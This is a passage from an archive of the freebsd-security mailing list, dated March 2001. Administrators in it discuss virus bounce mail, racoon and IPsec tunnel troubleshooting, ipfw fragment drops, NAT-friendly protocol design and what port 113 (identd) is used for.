dannyman@toldme.com) Received: by dell.dannyland.org (Postfix, from userid 1001) id D4D125BF9; Wed, 14 Mar 2001 18:05:53 -0800 (PST) Date: Wed, 14 Mar 2001 18:05:53 -0800 From: dannyman To: Jim Durham Cc: freebsd-security@freebsd.org Subject: Re: Sophos and Virus return mail Message-ID: <20010314180553.M3500@dell.dannyland.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from durham@w2xo.pgh.pa.us on Tue, Mar 13, 2001 at 11:54:01PM -0500 X-Loop: djhoward@uiuc.edu X-URL: http://www.dannyland.org/~dannyman/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Mar 13, 2001 at 11:54:01PM -0500, Jim Durham wrote: > Great discussion going on about Sophos and Amavis! > > This may be something I'm missing, but there are several > virii that apparently send no "envelope from" address when > they generate virus mail. One that comes to mind is the > stupid "Snow White" thing. [...] I get a couple of those a day in my root folder. At least. I just check the originating IP and make sure it is not one of my users. :) -d To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 18:37:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from mine.kame.net (kame195.kame.net [203.178.141.195]) by hub.freebsd.org (Postfix) with ESMTP id 323CC37B718; Wed, 14 Mar 2001 18:37:14 -0800 (PST) (envelope-from sakane@ydc.co.jp) Received: from localhost ([3ffe:501:4819:1000:260:1dff:fe21:f766]) by mine.kame.net (8.11.1/3.7W) with ESMTP id f2F2aRY24974; Thu, 15 Mar 2001 11:36:27 +0900 (JST) To: Bob@Talarian.Com Cc: FreeBSD-Security@FreeBSD.Org, FreeBSD-Questions@FreeBSD.Org Subject: Re: Racoon Problem & Cisco Tunnel In-Reply-To: Your message of "Sun, 11 Mar 2001 22:39:16 -0600" <3AAC52F4.1000602@Talarian.Com> References: <3AAC52F4.1000602@Talarian.Com> X-Mailer: Cue version 0.6 (010224-1625/sakane) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Message-Id: <20010315113552W.sakane@ydc.co.jp> Date: Thu, 15 Mar 2001 11:35:52 +0900 From: Shoichi Sakane X-Dispatcher: imput version 20000228(IM140) Lines: 11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > As near as I can tell, I have to run racoon and configure it for > pre-shared keys to talk to the cisco. But I don't think the racoon is > even starting right. I get this message: "ERROR: > pfkey.c:207:pfkey_handler(): pfkey X_SPDDUMP failed No such file or > directory." Happens with the config files I've written and the stock > ones. I'm running a freshly sup'd box with racoon-20010222a built from > ports. I think there was other reason why racoon couldn't work. This message means the SPD is empty. It doesn't mean a error happens. The tag, "ERROR" should be fixed. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 18:59:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from cs4.cs.ait.ac.th (cs4.cs.ait.ac.th [192.41.170.16]) by hub.freebsd.org (Postfix) with ESMTP id E6F0437B71D for ; Wed, 14 Mar 2001 18:59:24 -0800 (PST) (envelope-from on@cs.ait.ac.th) Received: from banyan.cs.ait.ac.th (on@banyan.cs.ait.ac.th [192.41.170.5]) by cs4.cs.ait.ac.th (8.9.3/8.9.3) with ESMTP id JAA03648 for ; Thu, 15 Mar 2001 09:59:04 +0700 (GMT+0700) Received: (from on@localhost) by banyan.cs.ait.ac.th (8.8.5/8.8.5) id JAA15200; Thu, 15 Mar 2001 09:59:16 +0700 (ICT) Date: Thu, 15 Mar 2001 09:59:16 +0700 (ICT) Message-Id: <200103150259.JAA15200@banyan.cs.ait.ac.th> X-Authentication-Warning: banyan.cs.ait.ac.th: on set sender to on@banyan.cs.ait.ac.th using -f From: Olivier Nicole To: freebsd-security@FreeBSD.ORG In-reply-to: (message from Jim Durham on Wed, 14 Mar 2001 11:31:05 -0500 (EST)) Subject: Re: Sophos and Virus return mail References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I would like to add my couple of cents to the topic. Actually you should check Reply-To:, From: then the From enveloppe in that order. And in any case copy the email to one of those guys who monitor the ISP with open relay and publish list for banning. Port 25 in my opinion MUST be closed, as far as it goes for individual users. In fact it could be closed even for corporate users as one bad corporate customer could cause the whole ISP address range to be banned. A centralised email exhange point is the only efficient way for an ISP to control that their users are not doing spam. As far as relaying, is should be open from outside to inside (considering the frontier is the ISP email exchange) and from inside to outside. But not from outside to outside. To address mobile configuration, say a customer using his laptop outside the ISP domain, relay can be set-up to open from outside to outside, for a limited period of time (usially 10 minutes) provided that the laptop first does a connection with POP or IMAP. The laptop identifies as a valid user of the ISP so he is allowed to use the ISP email gateway for a while. Olivier To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 20:21:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from shorty.ahpcns.com (joemoore-host.dsl.visi.com [209.98.246.61]) by hub.freebsd.org (Postfix) with ESMTP id 0EABD37B718 for ; Wed, 14 Mar 2001 20:21:33 -0800 (PST) (envelope-from jomor@ahpcns.com) Received: from ahpcns.com (localhost [127.0.0.1]) by shorty.ahpcns.com (Postfix) with ESMTP id 828693A2DD for ; Wed, 14 Mar 2001 22:21:30 -0600 (CST) Message-ID: <3AB0434A.2DEC2598@ahpcns.com> Date: Wed, 14 Mar 2001 22:21:30 -0600 From: jomor Organization: ahpcns X-Mailer: Mozilla 4.72 [en] (X11; I; FreeBSD 3.5-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: IPSEC tunnel without gif? References: <3AAEF702.9AC2715B@ahpcns.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org jomor wrote: > I've been setting up a VPN with tunnel mode IPSEC and things are going > OK so far but in searching the list archives, I've found some stuff that > seems to imply that gif tunnels are not needed for tunnel mode. Is this > true? I've only gotten it to work by pre-configuring the gif tunnel, but > now I'm not sure if I have true "tunnel mode IPSEC" or "transport mode > IPSEC" applied to an "IP-ENCAP" tunnel such as that suggested by the > X-bone project. > > seeking enlightenment ...jgm > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message Replying to my own post for those who are interested... I have set up a simple test network to figure this out. It's similar to the one in the ipsec.html page of the handbook except that I added a router to split up the segment between the gateways in order to better simulate "the Internet" piece. Routes were in place only to provide connectivity between the external interfaces of the "tunnel endpoint gateway" machines. The router sitting in the middle of the whole thing had no knowledge of the "private" networks. NAT was not enabled anywhere. The ipsec.conf files are just like the handbook page commands except that I made a versions for esp only and another version for ah (not "ah-old") and I specified "-m tunnel" instead of "-m any". After executing setkey I was able to ping the remote hosts for at least a little while. I was not able to connect long enough to do anything useful. Flushing and reloading the ipsec.conf file didn't help. Only a reboot would get it going again (but not for long). I ran some traces with a Network General sniffer and things looked as I expected while the pings were working. When the pings stopped working I could see that one of the gateways continued to transmit the pings, which did get to the remote gateway. The gateway that received the pings was transmitting ARP requests but strangely, it was trying to get the hardware address of the other tunnel endpoint rather than that of the router in the middle. Since the ARP requests were never answered, the ping response was never transmitted. This behavior was identical for both ah and esp tunnels. After rebooting all the machines, I created the gif tunnels and executed setkey. I was able to ftp some 1-5 MB files this way. I left the setup running over night so I'll see if it's still functioning in the morning. I'll be doing some traces with the gif setup for comparison as well. ...jgm To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 20:40:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from dragon.awen.com (dragon.awen.com [208.176.22.138]) by hub.freebsd.org (Postfix) with ESMTP id 9CA2437B719 for ; Wed, 14 Mar 2001 20:40:44 -0800 (PST) (envelope-from mburgett@dragon.awen.com) Received: (from mburgett@localhost) by dragon.awen.com (8.11.2/8.11.2) id f2F4eZB25117; Wed, 14 Mar 2001 20:40:35 -0800 (PST) Message-Id: <200103150440.f2F4eZB25117@dragon.awen.com> From: "Mike Burgett" To: "jomor" Cc: "freebsd-security@FreeBSD.ORG" Date: Wed, 14 Mar 2001 20:40:35 -0800 Reply-To: "Mike Burgett" X-Mailer: PMMail 2000 Professional (2.20.2030) For Windows 98 (4.10.2222) In-Reply-To: <3AB0434A.2DEC2598@ahpcns.com> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Subject: Re: IPSEC tunnel without gif? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 14 Mar 2001 22:21:30 -0600, jomor wrote: >The gateway that received the pings was transmitting ARP >requests but strangely, it was trying to get the hardware >address of the other tunnel endpoint rather than that of >the router in the middle. Since the ARP requests were never >answered, the ping response was never transmitted. This sounds an awful lot like: http://www.FreeBSD.org/cgi/query-pr.cgi?pr=21079 I added a static arp entry for my router awhile back to work around this very thing. Thanks, Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 23:39:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 40DBD37B719 for ; Wed, 14 Mar 2001 23:39:19 -0800 (PST) (envelope-from cjc@rfx-216-196-73-168.users.reflexcom.com) Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Wed, 14 Mar 2001 23:37:08 -0800 Received: (from cjc@localhost) by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f2F7dGM24680; Wed, 14 Mar 2001 23:39:16 -0800 (PST) (envelope-from cjc) Date: Wed, 14 Mar 2001 23:39:15 -0800 From: "Crist J. Clark" To: Szilveszter Adam Cc: freebsd-security@FreeBSD.ORG Subject: Re: Sophos and Virus return mail Message-ID: <20010314233915.E496@cjc-desktop.users.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <200103141333.f2EDX0J19096@fusion.borderware.com> <20010314231442.F12391@petra.hos.u-szeged.hu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010314231442.F12391@petra.hos.u-szeged.hu>; from sziszi@petra.hos.u-szeged.hu on Wed, Mar 14, 2001 at 11:14:42PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Mar 14, 2001 at 11:14:42PM +0100, Szilveszter Adam wrote: > > Ralph Huntington wrote: > > > > (This is one case where blocking of port 25 by ISPs is a good thing.) > > Yes. And makes using eg send-pr(1) real fun(TM). Huh? send-pr(1) just uses sendmail. It gets forwarded the same way all of your other mail does. What am I missing? -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 23:43:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id A3FD537B71A for ; Wed, 14 Mar 2001 23:43:16 -0800 (PST) (envelope-from cjc@rfx-216-196-73-168.users.reflexcom.com) Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Wed, 14 Mar 2001 23:41:16 -0800 Received: (from cjc@localhost) by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f2F7hHd24720; Wed, 14 Mar 2001 23:43:17 -0800 (PST) (envelope-from cjc) Date: Wed, 14 Mar 2001 23:43:17 -0800 From: "Crist J. Clark" To: Udo Erdelhoff Cc: security@FreeBSD.ORG Subject: Re: ipfw rule -1? Message-ID: <20010314234317.F496@cjc-desktop.users.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <20010313084020.A5859@agora.rdrop.com> <20010313232014.B496@cjc-desktop.users.reflexcom.com> <20010314220613.L83336@nathan.ruhr.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010314220613.L83336@nathan.ruhr.de>; from ue@nathan.ruhr.de on Wed, Mar 14, 2001 at 10:06:14PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Mar 14, 2001 at 10:06:14PM +0100, Udo Erdelhoff wrote: > On Tue, Mar 13, 2001 at 11:20:14PM -0800, Crist J. Clark wrote: > > Rule -1 is given for any packet dropped, but not dropped due to a user > > rule or the default rule. A quick look at the souce indicates the > > above pseudo-rule and some other fragment issues (bogusfrag) are the > > only such situations. > > Hmm, I have the following setup: A -current box mounts /usr/src5 and > /usr/obj5 via NFS from a RELENG_4 box. Doing "make installworld" fails > as soon there's a fragmented NFS packet - the fragments are dropped > by rule -1. The only time UDP packets would be dropped is when a m_pullup() call fails. I am not sure what that implies, but it does not sound good. I don't think that should be failing. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 0: 2:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtppop2pub.verizon.net (smtppop2pub.gte.net [206.46.170.21]) by hub.freebsd.org (Postfix) with ESMTP id 4080637B719; Thu, 15 Mar 2001 00:02:32 -0800 (PST) (envelope-from res03db2@gte.net) Received: from gte.net (evrtwa1-ar4-4-34-145-186.dsl.gtei.net [4.34.145.186]) by smtppop2pub.verizon.net with ESMTP ; id MAA110143109 Tue, 13 Mar 2001 12:56:47 -0600 (CST) Received: (from res03db2@localhost) by gte.net (8.9.3/8.9.3) id KAA59416; Tue, 13 Mar 2001 10:49:28 -0800 (PST) (envelope-from res03db2@gte.net) Date: Tue, 13 Mar 2001 10:49:27 -0800 From: Robert Clark To: Ted Mittelstaedt Cc: Bob Van Valzah , pW , FreeBSD-Security@FreeBSD.ORG, FreeBSD-Questions@FreeBSD.ORG Subject: Re: Racoon Problem & Cisco Tunnel Message-ID: <20010313104927.A59404@darkstar.gte.net> References: <3AACF40D.4080504@Talarian.Com> <000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com>; from tedm@toybox.placo.com on Mon, Mar 12, 2001 at 11:02:03PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ted, do you know of any online guidelines to wrting protocols that function well with NAT? Or maybe a list of protocols that don't work well with NAT? Thanks, [RC] On Mon, Mar 12, 2001 at 11:02:03PM -0800, Ted Mittelstaedt wrote: > >-----Original Message----- > >From: owner-freebsd-questions@FreeBSD.ORG > >[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Bob Van Valzah > >Sent: Monday, March 12, 2001 8:07 AM > >To: pW > >Cc: FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG > >Subject: Re: Racoon Problem & Cisco Tunnel > > > > > >Yes. The five DSL setups with which I'm familiar all grant at least one > >public address per house. I believe all are static, but one might be > >dynamic. Interference with protocols like IPSec is one of the reasons > >why I'd make a public address a requirement when choising a DSL > >provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all > >possible. Let's hasten the deployment of IPv6. > > > -snip- > > NAT has proven itself reliable and vital and idiot engineers that design TCP > protocols that assume everyone has a public IP number are just architecting > their own failures, and their protocol's subsequent minimizing by the > market. I have some sympathy for protocols like IPSec that came to be > during the same time - but organizational-to-organizational IPSec tunnels > don't have to pass through the NAT - they can terminate on it. But, anyone > doing a new protocol today is a fool if it can't work though a NAT. > > > > Ted Mittelstaedt tedm@toybox.placo.com > Author of: The FreeBSD Corporate Networker's Guide > Book website: http://www.freebsd-corp-net-guide.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 1:40:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id A7FD537B719; Thu, 15 Mar 2001 01:40:11 -0800 (PST) (envelope-from cjc@rfx-216-196-73-168.users.reflexcom.com) Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Thu, 15 Mar 2001 01:38:04 -0800 Received: (from cjc@localhost) by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f2F9e3028801; Thu, 15 Mar 2001 01:40:03 -0800 (PST) (envelope-from cjc) Date: Thu, 15 Mar 2001 01:39:55 -0800 From: "Crist J. Clark" To: Robert Clark Cc: Ted Mittelstaedt , Bob Van Valzah , pW , FreeBSD-Security@FreeBSD.ORG, FreeBSD-Questions@FreeBSD.ORG Subject: Re: Racoon Problem & Cisco Tunnel Message-ID: <20010315013955.A28471@rfx-216-196-73-168.users.reflex> Reply-To: cjclark@alum.mit.edu References: <3AACF40D.4080504@Talarian.Com> <000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com> <20010313104927.A59404@darkstar.gte.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010313104927.A59404@darkstar.gte.net>; from res03db2@gte.net on Tue, Mar 13, 2001 at 10:49:27AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Mar 13, 2001 at 10:49:27AM -0800, Robert Clark wrote: > > > Ted, do you know of any online guidelines to wrting protocols > that function well with NAT? > > > Or maybe a list of protocols that don't work well with NAT? One of the problems with NAT is that there are no standards. It supports whatever the NAT software vendor felt like supporting. In general, to be safe, the list of protocols that do not work well with NAT are, 1) Any protocol that is not TCP. Except you usually can get by with UDP, but watch for timeouts that can vary from seconds to hours. ICMP? Some might work, some might not, again, depends on the vendor. IPsec? Well, NAT completely breaks AH, but the code to NAT IPsec is completely trivial which does not imply that a lot of vendors do. Of course, NAT may or may not cause your IKE negotiations to fail... depending on the NAT implementation _and_ the IPsec implementation. Any other protocol? Maybe GRE, but good luck with anything else. Madness I tell you, madness. As RFC1631 says (an exact quote), The negative characteristics [of NAT] are: . . . 5. Problems with SNMP, DNS, ... you name it. ^^^^^^^^^^^ Damn straight; we've know all of this from the e begining. And on top of this, whatever you are running at the application layer might not like NAT either. Some minor protocols like, oh, FTP, need to have data changed at the application layer to function. The NAT software effectively has to act as an application proxy. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 2:20:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.freebsd-corp-net-guide.com (mail.freebsd-corp-net-guide.com [206.29.169.15]) by hub.freebsd.org (Postfix) with ESMTP id E785637B719; Thu, 15 Mar 2001 02:20:21 -0800 (PST) (envelope-from tedm@toybox.placo.com) Received: from tedm.placo.com (nat-rtr.freebsd-corp-net-guide.com [206.29.168.154]) by mail.freebsd-corp-net-guide.com (8.11.1/8.11.1) with SMTP id f2FAAvx03944; Thu, 15 Mar 2001 02:10:57 -0800 (PST) (envelope-from tedm@toybox.placo.com) From: "Ted Mittelstaedt" To: "Robert Clark" Cc: "Bob Van Valzah" , "pW" , , Subject: RE: Racoon Problem & Cisco Tunnel Date: Thu, 15 Mar 2001 02:10:56 -0800 Message-ID: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 In-reply-to: <20010313104927.A59404@darkstar.gte.net> X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >-----Original Message----- >From: owner-freebsd-questions@FreeBSD.ORG >[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Robert Clark > >Ted, do you know of any online guidelines to wrting protocols >that function well with NAT? > The rule of thumb is don't embed port information in the data payload. But here's some references: K. Egevang, P. Francis, "The IP Network Address Translator(NAT)", RFC 1631, May 1994. T. Hain, "Architectural Implications of NAT", Internet Draft,July 1998. Matt Holdrege, Pyda Srisuresh, "IP Network Address Translator(NAT) Protocol Issues", Internet Draft, August 1998. Yakov Rekhter, "Implications of NAT’s on the TCP/IParchitecture", Internet Draft, August 1998. P. Srisuresh, Matt Holdrege, "IP Network Address Translator(NAT) Terminology and Considerations", Internet Draft, July 1998. This list is from a post that Jim Gray made to the Questions list back in October that was very good. > >Or maybe a list of protocols that don't work well with NAT? > This is entirely implementation dependent. For example, Cisco has a list somewhere on their website that shows the ones they do and don't support. I don't know if anyone has made up a list for natd. Ted Mittelstaedt tedm@toybox.placo.com Author of: The FreeBSD Corporate Networker's Guide Book website: http://www.freebsd-corp-net-guide.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 10:20: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from salseiros.melim.com.br (salseiros.melim.com.br [200.215.110.23]) by hub.freebsd.org (Postfix) with ESMTP id A5E6937B719 for ; Thu, 15 Mar 2001 10:19:55 -0800 (PST) (envelope-from ronan@melim.com.br) Received: from fazendinha (fazendinha.melim.com.br [192.168.168.42]) by salseiros.melim.com.br (8.9.3/8.9.3) with SMTP id PAA80676 for ; Thu, 15 Mar 2001 15:12:47 -0300 (EST) (envelope-from ronan@melim.com.br) Message-ID: <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br> From: "Ronan Lucio" To: References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com> Subject: Port 113 Date: Thu, 15 Mar 2001 15:19:20 -0300 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi all, Could anybody say me when I need to allow the port 113 in the firewall? What services use this port? For example: I have a computer that is only DNS server, Does this port need allow connections the to DNS service work? Thank´s Ronan Lucio To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 10:24:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.epylon.com (sf-gw.epylon.com [63.93.9.98]) by hub.freebsd.org (Postfix) with ESMTP id 81B6837B718 for ; Thu, 15 Mar 2001 10:24:54 -0800 (PST) (envelope-from Jason.DiCioccio@Epylon.com) Received: by goofy.epylon.lan with Internet Mail Service (5.5.2653.19) id ; Thu, 15 Mar 2001 10:24:53 -0800 Message-ID: <657B20E93E93D4118F9700D0B73CE3EA0166D6D2@goofy.epylon.lan> From: Jason DiCioccio To: 'Ronan Lucio' , security@FreeBSD.ORG Subject: RE: Port 113 Date: Thu, 15 Mar 2001 10:24:49 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 No, you dont need it for DNS, but it's identd.. Used by some daemons to determine what the lusername of the client that's connecting is. - ------- Jason DiCioccio Evil Genius Unix BOFH mailto:jasond@epylon.com 415-593-2761 Direct & Fax 415-593-2900 Main Epylon Corporation 645 Harrison Street, Suite 200 San Francisco, CA 94107 www.epylon.com - -----Original Message----- From: Ronan Lucio [mailto:ronan@melim.com.br] Sent: Thursday, March 15, 2001 10:19 AM To: security@FreeBSD.ORG Subject: Port 113 Hi all, Could anybody say me when I need to allow the port 113 in the firewall? What services use this port? For example: I have a computer that is only DNS server, Does this port need allow connections the to DNS service work? Thank=B4s Ronan Lucio To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.8 for non-commercial use iQA/AwUBOrEJaFCmU62pemyaEQL9IQCgsygTNUOep2NkkDFiuI8dOUUte9AAniQr ZkwTGZUe4irnB8u1DsuYPQsg =3DCdTR -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 10:58:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from salseiros.melim.com.br (salseiros.melim.com.br [200.215.110.23]) by hub.freebsd.org (Postfix) with ESMTP id F17C337B719 for ; Thu, 15 Mar 2001 10:58:09 -0800 (PST) (envelope-from ronan@melim.com.br) Received: from fazendinha (fazendinha.melim.com.br [192.168.168.42]) by salseiros.melim.com.br (8.9.3/8.9.3) with SMTP id PAA85297 for ; Thu, 15 Mar 2001 15:51:05 -0300 (EST) (envelope-from ronan@melim.com.br) Message-ID: <09bb01c0ad81$ce3a7d60$2aa8a8c0@melim.com.br> From: "Ronan Lucio" To: References: <200103151822.f2FIMwp72248@pau-amma.whistle.com> Subject: Re: Port 113 Date: Thu, 15 Mar 2001 15:57:37 -0300 MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > >From: "Ronan Lucio" > >Date: Thu, 15 Mar 2001 15:19:20 -0300 > > >Could anybody say me when I need to allow the port 113 > >in the firewall? > > >What services use this port? Sorry, I wanted to say Waht applications use this port? What applications use auth service? > pau-amma[1] grep 113 /etc/services > auth 113/tcp ident tap #Authentication Service > auth 113/udp ident tap #Authentication Service > > >For example: I have a computer that is only DNS server, > >Does this port need allow connections the to DNS service work? > > No. > > Cheers, > david > -- > David Wolfskill dhw@whistle.com UNIX System Administrator > Desk: 650/577-7158 TIE: 8/499-7158 Cell: 650/759-0823 > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 15 11: 9:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 786FC37B719; Thu, 15 Mar 2001 11:09:43 -0800 (PST) (envelope-from nate@yogotech.com) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id MAA10308; Thu, 15 Mar 2001 12:08:04 -0700 (MST) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id MAA05639; Thu, 15 Mar 2001 12:08:03 -0700 (MST) (envelope-from nate) From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15025.4883.482820.502695@nomad.yogotech.com> Date: Thu, 15 Mar 2001 12:08:03 -0700 (MST) To: Robert Clark Cc: Ted Mittelstaedt , Bob Van Valzah , pW , FreeBSD-Security@FreeBSD.ORG, FreeBSD-Questions@FreeBSD.ORG Subject: Re: Racoon Problem & Cisco Tunnel In-Reply-To: <20010313104927.A59404@darkstar.gte.net> References: <3AACF40D.4080504@Talarian.Com> <000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com> <20010313104927.A59404@darkstar.gte.net> X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Ted, do you know of any online guidelines to wrting protocols > that function well with NAT? Here's some: 1) Single TCP socket (UDP requires special NAT code to work correctly). 2) The client must initiate the connection 3) The client's local port must *NOT* be fixed. 4) The server's remote port must be fixed 5) All port/address information must be contained within the packet headers (no information must be passed in the contents of the packets). If your protocol follows the above guidelines, it should work fine under NAT. Nate ps. Did I miss anything obvious? > Or maybe a list of protocols that don't work well with NAT? Any protocol that doesn't follow the above convention. DNS (which uses UDP) is an 'exception' in that most NAT implementation contain special code to deal with it. > On Mon, Mar 12, 2001 at 11:02:03PM -0800, Ted Mittelstaedt wrote: > > >-----Original Message----- > > >From: owner-freebsd-questions@FreeBSD.ORG > > >[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Bob Van Valzah > > >Sent: Monday, March 12, 2001 8:07 AM > > >To: pW > > >Cc: FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG > > >Subject: Re: Racoon Problem & Cisco Tunnel > > > > > > > > >Yes. The five DSL setups with which I'm familiar all grant at least one > > >public address per house. I believe all are static, but one might be 